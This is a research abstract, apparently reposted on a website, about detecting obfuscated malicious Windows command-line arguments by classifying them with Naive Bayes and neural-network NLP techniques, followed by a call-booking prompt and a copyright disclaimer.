Abstract
Windows command line arguments are used in administration of operating system through a CLI (command line interface). This command line interface gives access to multiple powerful system administration tools like PowerShell and WMIC. In an ideal scenario, access to CLI is restricted for malicious users, and the command line inputs are logged for forensic investigation. However, cyber criminals are implementing innovative command line obfuscation techniques to bypass those access restrictions and compromise system security. Traditional pattern matching techniques on obfuscated command line arguments are not suitable as detection mechanism due to the large search space presented in obfuscated command. In this work we used artificial intelligence driven natural language processing techniques for the classification of Windows command line as malicious or not. We implemented Multinomial Naive Bayes algorithm with neural network and trained it over a data set of malicious command line arguments. We evaluated the trained classifier in a real environment with both normal and malicious obfuscated command line argument and found our technique very effective in classifying malicious command line arguments with respect to false positives and performance.
Talk to us
Join us for a 30 min session where you can share your feedback and ask us any queries you have
Schedule a callDisclaimer: All third-party content on this website/platform is and will remain the property of their respective owners and is provided on "as is" basis without any warranties, express or implied. Use of third-party content does not indicate any affiliation, sponsorship with or endorsement by them. Any references to third-party content is to identify the corresponding services and shall be considered fair use under The CopyrightLaw.
